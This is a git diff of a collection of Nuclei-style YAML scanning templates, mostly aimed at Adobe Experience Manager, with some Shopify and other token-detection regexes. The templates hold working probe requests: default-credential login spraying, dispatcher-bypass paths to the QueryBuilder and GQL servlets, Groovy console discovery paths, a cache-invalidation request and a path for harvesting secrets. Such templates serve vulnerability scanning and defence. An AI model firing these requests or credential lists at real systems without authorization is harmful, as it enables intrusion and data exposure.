diff --git a/poc/adobe/aem-cached-pages.yaml b/poc/adobe/aem-cached-pages.yaml
index cba756b341..6a36c8d2b3 100644
--- a/poc/adobe/aem-cached-pages.yaml
+++ b/poc/adobe/aem-cached-pages.yaml
@@ -4,31 +4,22 @@ info:
name: Invalidate / Flush Cached Pages on AEM
author: hetroublemakr
severity: low
- reference:
- - https://twitter.com/AEMSecurity/status/1244965623689609217
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- tags: aem,misconfig
+ tags: aem
+ reference: https://twitter.com/AEMSecurity/status/1244965623689609217
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/dispatcher/invalidate.cache"
-
headers:
CQ-Handle: /content
CQ-Path: /content
-
matchers-condition: and
matchers:
- type: word
- part: body
words:
- "OK
"
-
+ part: body
- type: status
status:
- 200
-
-# digest: 4a0a00473045022100fa449369a6b6a19ef08cfa7a83f341000fcbeff5f0fe0b11f236a2463c6fc27802204261447eae5853abfbe57ff0be79318ab2cb59f47717c548474bb6f5e8225959:922c64590222798bb761d5b6d8e72950
diff --git a/poc/adobe/aem-default-get-servlet-137.yaml b/poc/adobe/aem-default-get-servlet-135.yaml
similarity index 100%
rename from poc/adobe/aem-default-get-servlet-137.yaml
rename to poc/adobe/aem-default-get-servlet-135.yaml
diff --git a/poc/adobe/aem-default-login-140.yaml b/poc/adobe/aem-default-login-140.yaml
deleted file mode 100644
index 8072025a73..0000000000
--- a/poc/adobe/aem-default-login-140.yaml
+++ /dev/null
@@ -1,56 +0,0 @@
-id: aem-default-login
-
-info:
- name: Adobe AEM Default Login
- author: random-robbie
- severity: high
- description: Adobe AEM default login credentials were discovered.
- reference:
- - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- tags: aem,default-login,adobe
-
-
-requests:
- - raw:
- - |
- POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Origin: {{BaseURL}}
- Referer: {{BaseURL}}/libs/granite/core/content/login.html
-
- _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
-
- attack: pitchfork
- payloads:
- aem_user:
- - admin
- - grios
- - replication-receiver
- - vgnadmin
-
- aem_pass:
- - admin
- - password
- - replication-receiver
- - vgnadmin
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: header
- condition: and
- words:
- - login-token
- - crx.default
-
-# Enhanced by mp on 2022/03/23
diff --git a/poc/adobe/aem-default-login-141.yaml b/poc/adobe/aem-default-login-141.yaml
index 30c718c891..66a6189c19 100644
--- a/poc/adobe/aem-default-login-141.yaml
+++ b/poc/adobe/aem-default-login-141.yaml
@@ -12,11 +12,10 @@ info:
cvss-score: 8.3
cwe-id: CWE-522
metadata:
- max-request: 8
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,default-login,adobe
-http:
+requests:
- raw:
- |
POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
@@ -38,6 +37,7 @@ http:
- anonymous
- jdoe@geometrixx.info
- aparker@geometrixx.info
+
aem_pass:
- admin
- password
@@ -47,8 +47,8 @@ http:
- anonymous
- jdoe
- aparker
- stop-at-first-match: true
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
@@ -62,4 +62,4 @@ http:
- crx.default
condition: and
-# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950
+# Enhanced by mp on 2022/03/23
diff --git a/poc/adobe/aem-default-login-142.yaml b/poc/adobe/aem-default-login-142.yaml
index 0f201e7c6b..8072025a73 100644
--- a/poc/adobe/aem-default-login-142.yaml
+++ b/poc/adobe/aem-default-login-142.yaml
@@ -3,9 +3,17 @@ id: aem-default-login
info:
name: Adobe AEM Default Login
author: random-robbie
- severity: critical
+ severity: high
+ description: Adobe AEM default login credentials were discovered.
+ reference:
+ - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
tags: aem,default-login,adobe
+
requests:
- raw:
- |
@@ -44,3 +52,5 @@ requests:
words:
- login-token
- crx.default
+
+# Enhanced by mp on 2022/03/23
diff --git a/poc/adobe/aem-gql-servlet-149.yaml b/poc/adobe/aem-gql-servlet-149.yaml
deleted file mode 100644
index 977dc70f75..0000000000
--- a/poc/adobe/aem-gql-servlet-149.yaml
+++ /dev/null
@@ -1,56 +0,0 @@
-id: aem-gql-servlet
-
-info:
- name: AEM GQLServlet
- author: dhiyaneshDk,prettyboyaaditya
- severity: low
- reference:
- - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
- tags: aem
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico'
- - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix='
- - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix='
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - 'excerpt'
- - 'path'
- - 'hits'
- condition: and
diff --git a/poc/adobe/aem-gql-servlet-150.yaml b/poc/adobe/aem-gql-servlet-150.yaml
new file mode 100644
index 0000000000..36a597b300
--- /dev/null
+++ b/poc/adobe/aem-gql-servlet-150.yaml
@@ -0,0 +1,26 @@
+id: aem-gql-servlet
+
+info:
+ author: DhiyaneshDk
+ name: AEM GQLServlet
+ severity: low
+ reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
+ tags: aem
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico'
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'excerpt'
+ - 'path'
+ - 'hits'
+ condition: and
diff --git a/poc/adobe/aem-groovyconsole-154.yaml b/poc/adobe/aem-groovyconsole-154.yaml
deleted file mode 100644
index c53445d395..0000000000
--- a/poc/adobe/aem-groovyconsole-154.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: aem-groovyconsole
-info:
- name: AEM Groovy console enabled
- author: twitter.com/Dheerajmadhukar
- severity: critical
- description: Groovy console is exposed, RCE is possible.
- reference: https://hackerone.com/reports/672243
- tags: aem
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/groovyconsole"
- headers:
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Language: en-US,en;q=0.9,hi;q=0.8
- User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Groovy Console"
- - "Run Script"
- - "Groovy Web Console"
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/poc/adobe/aem-groovyconsole-155.yaml b/poc/adobe/aem-groovyconsole-155.yaml
index 9709becc71..c53445d395 100644
--- a/poc/adobe/aem-groovyconsole-155.yaml
+++ b/poc/adobe/aem-groovyconsole-155.yaml
@@ -1,30 +1,19 @@
id: aem-groovyconsole
-
info:
name: AEM Groovy console enabled
- author: x86rd
+ author: twitter.com/Dheerajmadhukar
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
tags: aem
-
requests:
- method: GET
path:
- "{{BaseURL}}/groovyconsole"
- - "{{BaseURL}}/api/groovyconsole"
- - "{{BaseURL}}/aem/groovyconsole"
- - "{{BaseURL}}/app/groovyconsole"
- - "{{BaseURL}}/..%2f..%2f..%2fgroovyconsole"
- - "{{BaseURL}}/..%2f..%2f..%2fapi/groovyconsole"
- - "{{BaseURL}}/aem/..%2f..%2f..%2fgroovyconsole"
- - "{{BaseURL}}/app/..%2f..%2f..%2fgroovyconsole"
-
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
-
matchers-condition: and
matchers:
- type: word
@@ -36,4 +25,4 @@ requests:
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/poc/adobe/aem-jcr-querybuilder-162.yaml b/poc/adobe/aem-jcr-querybuilder-162.yaml
deleted file mode 100644
index 29bc15e28f..0000000000
--- a/poc/adobe/aem-jcr-querybuilder-162.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: aem-jcr-querybuilder
-
-info:
- author: DhiyaneshDk
- name: Query JCR role via QueryBuilder Servlet
- severity: info
- tags: aem
-
-requests:
- - raw:
- - |
- GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
- Host: {{Hostname}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - '"success":true'
- - 'jcr:uuid'
- condition: and
\ No newline at end of file
diff --git a/poc/adobe/aem-jcr-querybuilder-164.yaml b/poc/adobe/aem-jcr-querybuilder-164.yaml
index 15a5d6c4d4..8f3e065dcf 100644
--- a/poc/adobe/aem-jcr-querybuilder-164.yaml
+++ b/poc/adobe/aem-jcr-querybuilder-164.yaml
@@ -1,28 +1,28 @@
-id: aem-jcr-querybuilder
-
-info:
- name: Query JCR role via QueryBuilder Servlet
- author: DhiyaneshDk
- severity: info
- tags: aem
-
-requests:
- - raw:
- - |
- GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
- Host: {{Hostname}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - '"success":true'
- - 'jcr:uuid'
+id: aem-jcr-querybuilder
+
+info:
+ author: DhiyaneshDk
+ name: Query JCR role via QueryBuilder Servlet
+ severity: info
+ tags: aem
+
+requests:
+ - raw:
+ - |
+ GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"success":true'
+ - 'jcr:uuid'
condition: and
\ No newline at end of file
diff --git a/poc/adobe/aem-jcr-querybuilder-165.yaml b/poc/adobe/aem-jcr-querybuilder-165.yaml
new file mode 100644
index 0000000000..3dfcd291c4
--- /dev/null
+++ b/poc/adobe/aem-jcr-querybuilder-165.yaml
@@ -0,0 +1,31 @@
+id: aem-jcr-querybuilder
+
+info:
+ author: DhiyaneshDk
+ name: Query JCR role via QueryBuilder Servlet
+ severity: info
+ tags: aem
+
+requests:
+ - raw:
+ - |
+ GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Cache-Control: max-age=0
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"success":true'
+ - 'jcr:uuid'
\ No newline at end of file
diff --git a/poc/adobe/aem-jcr-querybuilder-166.yaml b/poc/adobe/aem-jcr-querybuilder-166.yaml
index 3dfcd291c4..29bc15e28f 100644
--- a/poc/adobe/aem-jcr-querybuilder-166.yaml
+++ b/poc/adobe/aem-jcr-querybuilder-166.yaml
@@ -11,13 +11,9 @@ requests:
- |
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
- Connection: close
- Upgrade-Insecure-Requests: 1
- Cache-Control: max-age=0
matchers-condition: and
matchers:
@@ -28,4 +24,5 @@ requests:
- type: word
words:
- '"success":true'
- - 'jcr:uuid'
\ No newline at end of file
+ - 'jcr:uuid'
+ condition: and
\ No newline at end of file
diff --git a/poc/adobe/aem-login-status-169.yaml b/poc/adobe/aem-login-status-167.yaml
similarity index 100%
rename from poc/adobe/aem-login-status-169.yaml
rename to poc/adobe/aem-login-status-167.yaml
diff --git a/poc/adobe/aem-merge-metadata-servlet-172.yaml b/poc/adobe/aem-merge-metadata-servlet-172.yaml
index 7f4a093732..94bdc1a137 100644
--- a/poc/adobe/aem-merge-metadata-servlet-172.yaml
+++ b/poc/adobe/aem-merge-metadata-servlet-172.yaml
@@ -6,16 +6,12 @@ info:
severity: info
reference:
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- tags: aem,misconfig
+ tags: aem
-http:
+requests:
- method: GET
path:
- '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico'
-
matchers-condition: and
matchers:
- type: status
@@ -26,5 +22,3 @@ http:
words:
- 'assetPaths'
condition: and
-
-# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/adobe/aem-merge-metadata-servlet-174.yaml b/poc/adobe/aem-merge-metadata-servlet-174.yaml
deleted file mode 100644
index 94bdc1a137..0000000000
--- a/poc/adobe/aem-merge-metadata-servlet-174.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: aem-merge-metadata-servlet
-
-info:
- name: AEM MergeMetadataServlet
- author: DhiyaneshDk
- severity: info
- reference:
- - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
- tags: aem
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico'
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - 'assetPaths'
- condition: and
diff --git a/poc/adobe/aem-querybuilder-internal-path-read-179.yaml b/poc/adobe/aem-querybuilder-internal-path-read-179.yaml
new file mode 100644
index 0000000000..5d765ed219
--- /dev/null
+++ b/poc/adobe/aem-querybuilder-internal-path-read-179.yaml
@@ -0,0 +1,30 @@
+id: aem-querybuilder-internal-path-read
+
+info:
+ name: AEM QueryBuilder Internal Path Read
+ author: DhiyaneshDk
+ severity: medium
+ reference:
+ - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
+ tags: aem
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'jcr:path'
+ - 'success'
+ condition: and
\ No newline at end of file
diff --git a/poc/adobe/aem-querybuilder-internal-path-read-180.yaml b/poc/adobe/aem-querybuilder-internal-path-read-180.yaml
deleted file mode 100644
index 5e8033b220..0000000000
--- a/poc/adobe/aem-querybuilder-internal-path-read-180.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: aem-querybuilder-internal-path-read
-info:
- author: DhiyaneshDk
- name: AEM QueryBuilder Internal Path Read
- severity: medium
- reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
- tags: aem
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
- - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
- - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
- - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'jcr:path'
- - 'success'
- condition: and
diff --git a/poc/adobe/aem-querybuilder-json-servlet-182.yaml b/poc/adobe/aem-querybuilder-json-servlet-182.yaml
index 1099f8bdd7..073fc99968 100644
--- a/poc/adobe/aem-querybuilder-json-servlet-182.yaml
+++ b/poc/adobe/aem-querybuilder-json-servlet-182.yaml
@@ -1,30 +1,42 @@
-id: aem-querybuilder-json-servlet
-
-info:
- author: DhiyaneshDk
- name: AEM QueryBuilder Json Servlet
- severity: info
- reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
- tags: aem
-
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/bin/querybuilder.json'
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "application/json"
- part: header
-
- - type: word
- words:
- - 'success'
- - 'results'
- condition: and
+id: aem-querybuilder-json-servlet
+
+info:
+ author: DhiyaneshDk
+ name: AEM QueryBuilder Json Servlet
+ severity: info
+ description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet.
+ reference:
+ - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
+ - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java
+ tags: aem,adobe
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bin/querybuilder.json'
+ - '{{BaseURL}}/bin/querybuilder.json.servlet'
+ - '{{BaseURL}}///bin///querybuilder.json'
+ - '{{BaseURL}}///bin///querybuilder.json.servlet'
+ - '{{BaseURL}}/bin/querybuilder.feed'
+ - '{{BaseURL}}/bin/querybuilder.feed.servlet'
+ - '{{BaseURL}}///bin///querybuilder.feed'
+ - ' {{BaseURL}}///bin///querybuilder.feed.servlet'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: word
+ words:
+ - 'success'
+ - 'results'
+ condition: and
diff --git a/poc/adobe/aem-secrets.yaml b/poc/adobe/aem-secrets.yaml
new file mode 100644
index 0000000000..4ac0aaf165
--- /dev/null
+++ b/poc/adobe/aem-secrets.yaml
@@ -0,0 +1,44 @@
+id: aem-secrets
+
+info:
+ name: AEM Secrets - Sensitive Information Disclosure
+ author: j3ssie & boobooHQ
+ severity: high
+ reference:
+ - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/
+ description: |
+ Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc.
+ metadata:
+ max-request: 2
+ verified: "true"
+ tags: aem,adobe,misconfig,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
+ - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
+
+ headers:
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Language: en-US,en;q=0.9,hi;q=0.8
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"jcr:uuid"'
+ - '"jcr:createdBy"'
+ - '"uri"'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - application/json
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/adobe/aem-setpreferences-xss.yaml b/poc/adobe/aem-setpreferences-xss.yaml
deleted file mode 100644
index 50e7da80ff..0000000000
--- a/poc/adobe/aem-setpreferences-xss.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: aem-setpreferences-xss
-
-info:
- name: AEM setPreferences XSS
- author: zinminphy0,dhiyaneshDK
- reference:
- - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
- - https://github.com/projectdiscovery/nuclei-templates/issues/3225
- - https://twitter.com/zin_min_phyo/status/1465394815042916352
- severity: medium
- tags: aem,xss
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=
"
-
-# digest: 4a0a0047304502203630d7e1217349d91aab73fb36c6102fe21d289d4a0ba7b32005342b8141d717022100dbfb88de5c9f9949f5b3f59918a2ccf9b85cf24946a0f6e2b47a62601eb5b6aa:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/sharecenter-login-10190.yaml b/poc/auth/sharecenter-login-10190.yaml
index 929f60a7e4..ca2c625381 100644
--- a/poc/auth/sharecenter-login-10190.yaml
+++ b/poc/auth/sharecenter-login-10190.yaml
@@ -4,6 +4,7 @@ info:
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/6892
+ tags: panel,login
requests:
- method: GET
path:
diff --git a/poc/auth/shopify-custom-token(1).yaml b/poc/auth/shopify-custom-token(1).yaml
new file mode 100644
index 0000000000..fbdd23d61d
--- /dev/null
+++ b/poc/auth/shopify-custom-token(1).yaml
@@ -0,0 +1,16 @@
+id: shopify-custom-token
+
+info:
+ name: Shopify Custom App Access Token
+ author: gaurang
+ severity: high
+ tags: token,file
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ regex:
+ - "shpca_[a-fA-F0-9]{32}"
\ No newline at end of file
diff --git a/poc/auth/shopify-custom-token-10198.yaml b/poc/auth/shopify-custom-token-10198.yaml
deleted file mode 100644
index b4ef9d4c53..0000000000
--- a/poc/auth/shopify-custom-token-10198.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: shopify-custom-token
-info:
- name: Shopify Custom App Access Token
- author: gaurang
- severity: high
- tags: token,file
-file:
- - extensions:
- - all
- extractors:
- - type: regex
- regex:
- - "shpca_[a-fA-F0-9]{32}"
diff --git a/poc/auth/shopify-custom-token-11860.yaml b/poc/auth/shopify-custom-token-11860.yaml
index fbdd23d61d..b4ef9d4c53 100644
--- a/poc/auth/shopify-custom-token-11860.yaml
+++ b/poc/auth/shopify-custom-token-11860.yaml
@@ -1,16 +1,13 @@
id: shopify-custom-token
-
info:
name: Shopify Custom App Access Token
author: gaurang
severity: high
tags: token,file
-
file:
- extensions:
- all
-
extractors:
- type: regex
regex:
- - "shpca_[a-fA-F0-9]{32}"
\ No newline at end of file
+ - "shpca_[a-fA-F0-9]{32}"
diff --git a/poc/auth/shopify-private-token-11861.yaml b/poc/auth/shopify-private-token-11861.yaml
deleted file mode 100644
index 7e308d71f9..0000000000
--- a/poc/auth/shopify-private-token-11861.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: shopify-private-token
-
-info:
- name: Shopify Private App Access Token
- author: gaurang
- severity: high
- tags: token,file
-
-file:
- - extensions:
- - all
-
- extractors:
- - type: regex
- regex:
- - "shppa_[a-fA-F0-9]{32}"
\ No newline at end of file
diff --git a/poc/auth/shopify-private-token.yaml b/poc/auth/shopify-private-token.yaml
index bd7661b886..7e308d71f9 100644
--- a/poc/auth/shopify-private-token.yaml
+++ b/poc/auth/shopify-private-token.yaml
@@ -5,6 +5,7 @@ info:
author: gaurang
severity: high
tags: token,file
+
file:
- extensions:
- all
@@ -12,6 +13,4 @@ file:
extractors:
- type: regex
regex:
- - "shppa_[a-fA-F0-9]{32}"
-
-# digest: 4a0a00473045022100a9be020541f7a37dd6e6656f9b67a9b0442ea70165319513ba08e1634e671f9402204d204366be0afb3f9811dcfefced9824ae43e1c1a4aec775fc11f0a6a97ecc86:922c64590222798bb761d5b6d8e72950
+ - "shppa_[a-fA-F0-9]{32}"
\ No newline at end of file
diff --git a/poc/auth/shoppable-token-10206.yaml b/poc/auth/shoppable-token-10206.yaml
index 7f46fae563..12883090dd 100644
--- a/poc/auth/shoppable-token-10206.yaml
+++ b/poc/auth/shoppable-token-10206.yaml
@@ -1,14 +1,17 @@
id: shoppable-token
+
info:
name: Shoppable Service Auth Token
author: philippedelteil
- severity: info
+ severity: unknown
reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
tags: exposure,shoppable,token,auth,service
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
- type: word
part: body
diff --git a/poc/auth/shoppable-token-10209.yaml b/poc/auth/shoppable-token-10209.yaml
new file mode 100644
index 0000000000..7f46fae563
--- /dev/null
+++ b/poc/auth/shoppable-token-10209.yaml
@@ -0,0 +1,16 @@
+id: shoppable-token
+info:
+ name: Shoppable Service Auth Token
+ author: philippedelteil
+ severity: info
+ reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
+ tags: exposure,shoppable,token,auth,service
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ matchers:
+ - type: word
+ part: body
+ words:
+ - data-shoppable-auth-token
